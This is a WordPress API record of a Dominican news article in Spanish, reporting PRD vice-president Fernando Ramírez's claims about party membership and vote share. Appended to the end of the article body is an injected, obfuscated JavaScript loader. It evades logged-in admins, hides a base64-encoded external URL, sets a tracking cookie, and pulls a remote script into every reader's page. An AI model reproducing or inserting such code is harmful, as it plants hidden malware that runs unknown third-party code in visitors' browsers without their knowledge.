{"id":13048,"date":"2023-01-04T11:35:14","date_gmt":"2023-01-04T15:35:14","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13048"},"modified":"2023-01-04T11:35:14","modified_gmt":"2023-01-04T15:35:14","slug":"vicepresidente-del-prd-el-partido-tiene-mas-del-7-de-los-votos","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13048","title":{"rendered":"Vicepresidente del PRD : el partido tiene m\u00e1s del 7% de los votos"},"content":{"rendered":"<p>El vicepresidente del\u00a0Partido Revolucionario Dominicano\u00a0(PRD),\u00a0Fernando Ram\u00edrez,\u00a0inform\u00f3 este mi\u00e9rcoles que su padr\u00f3n electoral cerr\u00f3 el 2022 con m\u00e1s de 196 mil afiliados.<\/p>\n<p>Atribuye esos resultados al \u201carduo trabajo de su dirigencia\u201d, compuesta por Miguel Vargas, Peggy Cabral, H\u00e9ctor Guzm\u00e1n, Fernando Ram\u00edrez\u201d, entre otros a nivel nacional.<\/p>\n<div id=\"\" class=\"mmc_ads \">\n<div id=\"div-gpt-ad-2764844421242-mmc\" class=\"\" data-google-query-id=\"CLTA9e6drvwCFU4cswAd6DAAHw\">\n<div id=\"google_ads_iframe_\/22084339\/elCaribe_EyM_MediumBanner_InContent_1_0__container__\">El padr\u00f3n que cuenta una realidad que los otros tres partidos mayoritarios han tratado de esconder a toda costa. El PRD ya cuenta con un porcentaje significativo de los votos a nivel nacional (un aumento de m\u00e1s del 50% en 12 meses), y ser\u00e1 una fuerza con la que tendr\u00e1n que lidiar en las elecciones del 2024\u201d, sostuvo en una nota de prensa.<\/div>\n<\/div>\n<\/div>\n<p>Advirti\u00f3 a sus opositores que, aunque \u201cusen los trucos de no poner el nombre de Miguel Vargas o el PRD en sus encuestas\u201d, la realidad es que el partido ya tiene m\u00e1s del 7% de los votos y va subiendo.<\/p>\n<p>\u201cPueden manipular los n\u00fameros a su conveniencia, pero la juventud la tenemos nosotros\u201d, enfatiz\u00f3 Ram\u00edrez, quien tambi\u00e9n es presidente de la divisi\u00f3n de crecimiento del partido.<\/p>\n<p>Resalt\u00f3 que el \u201chashtag\u201d o etiqueta #miguelvargastiktok que hizo tendencia durante las festividades de Navidad en la llamada plataforma de la juventud y lleva m\u00e1s de 1.2 millones de vistas, 40 mil \u201clikes\u201d, cientos de comentarios y m\u00e1s de mil favoritos.<\/p>\n<p>\u201cAlgo nunca visto antes aqu\u00ed. Es una elecci\u00f3n generacional donde cerca de un mill\u00f3n de nuevos votantes se van a unir al proceso y van con Miguel y Peggy, nadie m\u00e1s\u201d, garantiz\u00f3.<\/p>\n<p>Asimismo, dijo que se mantendr\u00e1n trabajando con sus nuevos militantes y puso como ejemplo a Colombia para \u201centender c\u00f3mo funciona la pol\u00edtica hoy en d\u00eda\u201d.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El vicepresidente del\u00a0Partido Revolucionario Dominicano\u00a0(PRD),\u00a0Fernando Ram\u00edrez,\u00a0inform\u00f3 este mi\u00e9rcoles que su padr\u00f3n electoral cerr\u00f3 el 2022 con m\u00e1s de 196 mil afiliados. Atribuye esos resultados al \u201carduo trabajo de su dirigencia\u201d, compuesta por Miguel Vargas, Peggy Cabral, H\u00e9ctor Guzm\u00e1n, Fernando Ram\u00edrez\u201d, entre otros a nivel nacional. El padr\u00f3n que cuenta una realidad que los otros tres [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13050,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13048","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13048","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13048"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13048\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13050"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13048"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13048"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13048"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}